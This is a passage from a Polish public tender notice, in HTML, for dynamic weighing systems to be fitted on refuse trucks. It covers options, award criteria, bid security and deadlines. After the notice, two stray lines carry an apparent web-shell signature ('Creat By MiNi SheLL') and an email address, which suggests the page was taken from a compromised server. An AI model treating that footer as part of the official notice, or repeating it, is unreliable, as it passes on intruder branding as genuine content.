społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia w zakresie Zadania 3 obejmuje dostawę i montaż na maksymalnie 4 szt. pojazdów bezpylnych<br/>fabrycznie nowych dynamicznych systemów wagowych wraz z serwisem i szkoleniami wymaganymi przez Zamawiającego.<br/>Zamawiający deklaruje realizację zamówienia w minimalnym zakresie obejmującym: Zadanie 3: Dostawę i montaż na 3 szt.<br/>pojazdów bezpylnych fabrycznie nowych dynamicznych systemów wagowych wraz z serwisem i szkoleniami wymaganymi<br/>przez Zamawiającego.<br/>2. Pod pojęciem dynamicznego systemu wagowego (dalej system wagowy, system ważenia) należy rozumieć wagę<br/>automatyczną dla pojedynczych ładunków klasy Y (b): komputer wagowy, czujniki pomiarowe, czujniki wyzwalające, system<br/>wykrycia obecności pojemnika, okablowanie łączące czujniki z komputerem, elementy mocujące. Podstawową częścią<br/>składową systemu jest komputer wagowy, do którego podłączone zostaną sygnały z powyższych czujników. Ilość i typ<br/>czujników wyzwalających niezbędnych do prawidłowej pracy systemu wagowego niezależnie od typu urządzenia<br/>załadowczego zobowiązany jest określić Wykonawca.<br/>3. Wykonawca jest zobligowany do dostosowania liczby czujników pomiarowych oraz pomocniczych do modelu oraz wersji<br/>zabudowy, na której zamontowany zostanie system. Zamawiający informuje, że system wagowy będzie montowany na:<br/>Zadanie 3 – pojazdach z zabudową bezpylną o pojemności ładunkowej 19-23 m3. Pojazdy wyposażone w urządzenie załadowcze zgodnie z normą PN-EN 1501-5:2021-08 (lub równoważną), z dwoma niezależnie pracującymi zespołami unosząco-wywracającymi, z uchwytem grzebieniowym - dzielone urządzenie załadowcze (dzielone grzebienie), pracujące niezależnie od siebie), dostosowane do współpracy z pojemnikami od 120 l do 1100 l, wyprodukowanymi zgodnie z normą PN-EN840 lub równoważną. Zabudowa (każda odrębnie) posiada znak CE.<br/>4. Przedmiot zamówienia obejmuje:<br/>a) dostawę i montaż fabrycznie nowych systemów wagowych na pojazdach bezpylnych,<br/>b) ocenę zgodności każdego systemu wagowego nadaną przez Główny Urząd Miar (GUM) lub Okręgowy Urząd Miar (OUM)<br/>lub instytucję równoważną upoważnioną do poświadczania dokonania legalizacji,<br/>c) legalizację ponowną każdego systemu wagowego nadaną przez Główny Urząd Miar (GUM) lub<br/>Okręgowy Urząd Miar (OUM),<br/>d) szkolenia w zakresie przewidzianym przez Zamawiającego,<br/>e) usługę serwisową przez okres równy okresowy gwarancji.<br/>4. Montowane na pojazdach systemy wagowe (systemy ważenia) (każdy odrębnie) muszą być fabrycznie nowe,<br/>wyprodukowane nie wcześniej niż w 2023 roku.<br/>5. Wykonawca udzieli Zamawiającemu gwarancji w wymiarze 36 miesięcy w odniesieniu do zainstalowanego systemu<br/>wagowego dla każdego pojazdu, a okres gwarancji w odniesieniu do zainstalowanego systemu wagowego dla każdego z<br/>pojazdów rozpocznie się z chwilą podpisania bezusterkowego protokołu obioru ilościowo - jakościowego dla danego<br/>pojazdu.<br/>6. Oferowany przedmiot zamówienia nie może być rozwiązaniem prototypowym oraz musi być wykorzystany na<br/>przynajmniej 5 pojazdach bezpylnych w warunkach rzeczywistego odbioru odpadów.<br/>Szczegółowy Opis Przedmiotu Zamówienia znajduje się w Części II SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42923110-6 - Wagi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający deklaruje realizację zamówienia w minimalnym zakresie obejmującym: Zadanie 3: Dostawę i montaż na 3 szt.<br/>pojazdów bezpylnych fabrycznie nowych dynamicznych systemów wagowych wraz z serwisem i szkoleniami wymaganymi<br/>przez Zamawiającego.<br/>Zamawiający zastrzega sobie prawo do realizacji pozostałego zakresu zamówienia, tj.: Zadanie 3: Dostawę i montaż na<br/>pojeździe bezpylnym fabrycznie nowego dynamicznego systemu wagowego wraz z serwisem i szkoleniami wymaganymi<br/>przez Zamawiającego w ilości 1 szt.,<br/>- do jego maksymalnej wielkości określonej powyżej na zasadach prawa opcji. Skorzystanie z prawa opcji uzależnione<br/>będzie od decyzji Zamawiającego.<br/>Zamawiający przewiduje wykorzystanie prawa opcji w terminie 360 dni od zawarcia umowy w następujących sytuacjach<br/>(kiedy zajdzie co najmniej jedna z nich):<br/>- gdy nastąpi awaria systemu wagowego obecnie zainstalowanego i użytkowanego na pojeździe bezpylnym<br/>eksploatowanym przez Zamawiającego i konieczna będzie jego wymiana na nowy,<br/>- gdy nastąpi zwiększenie floty pojazdów bezpylnych.<br/>Zamawiający, każdorazowo na co najmniej trzy dni kalendarzowe przed złożeniem zamówienia w ramach prawa opcji<br/>(oddzielnie dla każdego zadania), poinformuje o tym fakcie Wykonawcę pisemnie.<br/>Uprawnionym do złożenia zamówienia w ramach prawa opcji w imieniu Zamawiającego jest koordynator umowy bądź osoba<br/>stosownie upoważniona przez Zamawiającego. W razie skorzystania z prawa opcji, na Wykonawcę nałożony w ten sposób<br/>zostanie obowiązek realizacji zamówienia, na warunkach zawartej umowy, bez konieczności negocjacji między Stronami.<br/>Skorzystanie z prawa opcji polegać będzie na realizacji zamówienia częściowego przedmiotu zamówienia po cenie<br/>jednostkowej zaproponowanej przez Wykonawcę w ofercie.<br/>Przedmiotowa deklaracja nie dotyczy przypadku odstąpienia od umowy lub rozwiązania umowy lub jej zakończenia z<br/>jakiejkolwiek przyczyny przed upływem terminu, na jaki została zawarta, w tym w przypadkach określonych w § 6 umowy.<br/>Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie<br/>przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w<br/>stosunku do Zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji (dostawy, montażu i oceny zgodności)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia w zakresie Zadania 4 obejmuje dostawę i montaż na maksymalnie 3 szt. pojazdów bezpylnych<br/>fabrycznie nowych dynamicznych systemów wagowych wraz z serwisem i szkoleniami wymaganymi przez Zamawiającego.<br/>Zamawiający deklaruje realizację zamówienia w minimalnym zakresie obejmującym: Zadanie 4: Dostawę i montaż na 2 szt.<br/>pojazdów bezpylnych fabrycznie nowych dynamicznych systemów wagowych wraz z serwisem i szkoleniami wymaganymi<br/>przez Zamawiającego.<br/>2. Pod pojęciem dynamicznego systemu wagowego (dalej system wagowy, system ważenia) należy rozumieć wagę<br/>automatyczną dla pojedynczych ładunków klasy Y (b): komputer wagowy, czujniki pomiarowe, czujniki wyzwalające, system<br/>wykrycia obecności pojemnika, okablowanie łączące czujniki z komputerem, elementy mocujące. Podstawową częścią<br/>składową systemu jest komputer wagowy, do którego podłączone zostaną sygnały z powyższych czujników. Ilość i typ<br/>czujników wyzwalających niezbędnych do prawidłowej pracy systemu wagowego niezależnie od typu urządzenia<br/>załadowczego zobowiązany jest określić Wykonawca.<br/>3. Wykonawca jest zobligowany do dostosowania liczby czujników pomiarowych oraz pomocniczych do modelu oraz wersji<br/>zabudowy, na której zamontowany zostanie system. Zamawiający informuje, że system wagowy będzie montowany na:<br/>Zadanie 4 – pojazdach z zabudową bezpylną o pojemności ładunkowej 19-23 m3. Pojazdy wyposażone w urządzenie załadowcze zgodnie z normą PN-EN 1501-5:2021-08 (lub równoważną), z dwoma niezależnie pracującymi zespołami unosząco-wywracającymi, z uchwytem grzebieniowym - dzielone urządzenie załadowcze (dzielone grzebienie), pracujące niezależnie od siebie), dostosowane do współpracy z pojemnikami od 120 l do 1100 l, wyprodukowanymi zgodnie z normą PN-EN840 lub równoważną. Zabudowa (każda odrębnie) posiada znak CE. <br/>4. Przedmiot zamówienia obejmuje:<br/>a) dostawę i montaż fabrycznie nowych systemów wagowych na pojazdach bezpylnych,<br/>b) ocenę zgodności każdego systemu wagowego nadaną przez Główny Urząd Miar (GUM) lub Okręgowy Urząd Miar (OUM)<br/>lub instytucję równoważną upoważnioną do poświadczania dokonania legalizacji,<br/>c) legalizację ponowną każdego systemu wagowego nadaną przez Główny Urząd Miar (GUM) lub<br/>Okręgowy Urząd Miar (OUM),<br/>d) szkolenia w zakresie przewidzianym przez Zamawiającego,<br/>e) usługę serwisową przez okres równy okresowy gwarancji.<br/>4. Montowane na pojazdach systemy wagowe (systemy ważenia) (każdy odrębnie) muszą być fabrycznie nowe,<br/>wyprodukowane nie wcześniej niż w 2023 roku.<br/>5. Wykonawca udzieli Zamawiającemu gwarancji w wymiarze 36 miesięcy w odniesieniu do zainstalowanego systemu<br/>wagowego dla każdego pojazdu, a okres gwarancji w odniesieniu do zainstalowanego systemu wagowego dla każdego z<br/>pojazdów rozpocznie się z chwilą podpisania bezusterkowego protokołu obioru ilościowo - jakościowego dla danego<br/>pojazdu.<br/>6. Oferowany przedmiot zamówienia nie może być rozwiązaniem prototypowym oraz musi być wykorzystany na<br/>przynajmniej 5 pojazdach bezpylnych w warunkach rzeczywistego odbioru odpadów.<br/>Szczegółowy Opis Przedmiotu Zamówienia znajduje się w Części II SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42923110-6 - Wagi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający deklaruje realizację zamówienia w minimalnym zakresie obejmującym: Zadanie 4: Dostawę i montaż na 2<br/>szt. pojazdów bezpylnych fabrycznie nowych dynamicznych systemów wagowych wraz z serwisem i szkoleniami<br/>wymaganymi przez Zamawiającego.<br/>Zamawiający zastrzega sobie prawo do realizacji pozostałego zakresu zamówienia, tj.: Zadanie 4: Dostawę i montaż na<br/>pojeździe bezpylnym fabrycznie nowego dynamicznego systemu wagowego wraz z serwisem i szkoleniami wymaganymi<br/>przez Zamawiającego w ilości 1 szt.,<br/>- do jego maksymalnej wielkości określonej powyżej na zasadach prawa opcji. Skorzystanie z prawa opcji uzależnione<br/>będzie od decyzji Zamawiającego.<br/>Zamawiający przewiduje wykorzystanie prawa opcji w terminie 360 dni od zawarcia umowy w następujących sytuacjach<br/>(kiedy zajdzie co najmniej jedna z nich):<br/>- gdy nastąpi awaria systemu wagowego obecnie zainstalowanego i użytkowanego na pojeździe bezpylnym<br/>eksploatowanym przez Zamawiającego i konieczna będzie jego wymiana na nowy,<br/>- gdy nastąpi zwiększenie floty pojazdów bezpylnych.<br/><br/>Zamawiający, każdorazowo na co najmniej trzy dni kalendarzowe przed złożeniem zamówienia w ramach prawa opcji<br/>(oddzielnie dla każdego zadania), poinformuje o tym fakcie Wykonawcę pisemnie.<br/>Uprawnionym do złożenia zamówienia w ramach prawa opcji w imieniu Zamawiającego jest koordynator umowy bądź osoba<br/>stosownie upoważniona przez Zamawiającego. W razie skorzystania z prawa opcji, na Wykonawcę nałożony w ten sposób<br/>zostanie obowiązek realizacji zamówienia, na warunkach zawartej umowy, bez konieczności negocjacji między Stronami.<br/>Skorzystanie z prawa opcji polegać będzie na realizacji zamówienia częściowego przedmiotu zamówienia po cenie<br/>jednostkowej zaproponowanej przez Wykonawcę w ofercie.<br/><br/>Przedmiotowa deklaracja nie dotyczy przypadku odstąpienia od umowy lub rozwiązania umowy lub jej zakończenia z<br/>jakiejkolwiek przyczyny przed upływem terminu, na jaki została zawarta, w tym w przypadkach określonych w § 6 umowy.<br/>Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie<br/>przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w<br/>stosunku do Zamawiającego; <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji (dostawy, montażu i oceny zgodności)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie będzie żądał podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie określił warunków udziału w postępowaniu, dlatego nie będzie żądał podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie będzie żądał przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Numeracja przeniesiona z SWZ:<br/>11.5.	Na ofertę składają się:<br/>11.5.1.	wypełniony Formularz elektroniczny dla danego zadania dostępny i generowany poprzez Platformę (Formularz ofertowy).<br/>11.6.	Do oferty Wykonawca dołącza:<br/>11.6.1.	oryginał dokumentu wadium, jeśli wadium jest składane w innej formie niż pieniężna – zgodnie z zapisami pkt. 10.4. SWZ<br/>11.6.2.	aktualne na dzień składania ofert oświadczenie Wykonawcy o niepodleganiu wykluczeniu, o treści zgodnej z określoną we wzorze stanowiącym załącznik nr 1 do SWZ; <br/>11.6.3.	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów rejestrowych Wykonawcy (z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru).<br/>Powyższe stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (np. pełnomocnictwo, umowa spółki cywilnej).<br/>11.6.4.	w przypadku, gdy oferta zawiera tajemnicę przedsiębiorstwa – dowody, o których mowa w pkt. 11.9.3. SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest, przed upływem terminu składania ofert, wnieść wadium w kwocie: <br/>- w zakresie zadania 1 – 2 340,00 zł,<br/>- w zakresie zadania 2 – 1 760,00 zł.<br/>- w zakresie zadania 3 – 2 340,00 zł,<br/>- w zakresie zadania 4 – 1 760,00 zł.<br/>Wadium może być wnoszone w następujących formach:<br/>- pieniądzu;<br/>- gwarancjach bankowych;<br/>- gwarancjach ubezpieczeniowych;<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. z 2023 r. poz. 462 ze zm.). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Numeracja przeniesiona z SWZ:<br/>9.1.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (konsorcja i spółki cywilne) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>9.2.	Oryginał pełnomocnictwa opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym, podpisem osobistym lub kopia potwierdzona notarialnie opatrzona kwalifikowanym podpisem elektronicznym notariusza powinien być załączony do oferty i zawierać w szczególności wskazanie postępowania, którego dotyczy i zakresu umocowania pełnomocnika. <br/>9.3.	Podpisy na pełnomocnictwie muszą być złożone przez osoby uprawnione <br/>do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. W przypadku, gdy upoważnienie osób podpisujących pełnomocnictwa nie wynika z innych dokumentów złożonych wraz z ofertą Wykonawca udowodni upoważnienie tych osób w szczególności przedstawiając stosowne pełnomocnictwa. Dokument pełnomocnictwa winien zostać złożony <br/>w sposób określony w pkt. 11.7.3. SWZ. <br/>9.4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne/konsorcja), żaden z nich nie może podlegać wykluczeniu z powodu niespełniania warunków, o których mowa w art. 108 ust. 1 ustawy lub w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tekst jedn. Dz.U. z 2024 r., poz. 507).<br/>9.5.	Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (każdy członek konsorcjum/wspólnik spółki cywilnej) składających ofertę wspólną musi wykazać brak podstaw do wykluczenia, o których mowa: w art. 108 <br/>ust. 1 ustawy, w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tekst jedn. Dz.U. z 2024 r., poz. 507). W tym celu każdy z członków konsorcjum/ wspólnik spółki cywilnej wypełnia oświadczenie – wg wzoru określonego w załączniku nr 1 do SWZ. <br/>9.6.	Oświadczenia lub formularze sporządzone zgodnie z załączonymi do SWZ wzorami, <br/>składa i podpisuje w imieniu wszystkich Wykonawców Pełnomocnik lub wszyscy Wykonawcy wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających ofertę wspólną.<br/>9.7.	Oświadczenie, o którym mowa w pkt. 11.6.2. SWZ każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (każdy uczestnik konsorcjum oraz wspólnik spółki cywilnej) składa indywidualnie.<br/>9.8.	Poświadczenia za zgodność z oryginałem dokonują wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, w zakresie dokumentów, które każdego <br/>z nich dotyczą. Podpis i poświadczenie za zgodność z oryginałem muszą być złożone za pomocą kwalifikowanego podpisu elektronicznego, podpisu zaufanego<br/>lub podpisu osobistego.<br/>9.9.	Zamawiający nie określił odmiennych wymagań związanych z realizacją zamówienia w odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość dokonywania zmian umowy, zgodnie z art. 455 ust. 1 i 2 ustawy, wszelkich zmian dopuszczalnych z mocy prawa i nie wymagających ich przewidzenia <br/>w SWZ, a także zmian, których zakres, charakter i warunki wprowadzenia przewidziano we wzorze umowy – Części IV SWZ – Projektowane postanowienia umowy. Zmiany w umowie mogą być dokonywane w przypadkach określonych we wzorze umowy – Części IV SWZ – Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mpowarszawa.ezamawiajacy.pl/pn/mpowarszawa/demand/180067/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-02 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy z postępowania Wykonawców w stosunku <br/>do których zachodzą przesłanki wykluczenia wskazane w art. 108 <br/>ust. 1 ustawy lub w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tekst jedn. Dz.U. z 2024 r., poz. 507).<br/><br/>Przedmiot zamówienia (dotyczy wszystkich zadań) w zakresie obejmującym: <br/>a)	dostawę i montaż fabrycznie nowych systemów wagowych na pojazdach bezpylnych, <br/>b)	ocenę zgodności każdego systemu wagowego nadaną przez Główny Urząd Miar (GUM) lub Okręgowy Urząd Miar (OUM) lub instytucję równoważną upoważnioną do poświadczania dokonania legalizacji, <br/>- będzie realizowany w terminie zadeklarowanym w Formularzu ofertowym, stanowiącym załącznik nr 2 do umowy, przy czym nie może przekroczyć 14 dni kalendarzowych od daty udostępnienia pojazdów Wykonawcy (dotyczy zamówienia podstawowego oraz objętego prawem opcji).<br/><br/>Wykonawca pozostaje związany złożoną ofertą do dnia 31.01.2025 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com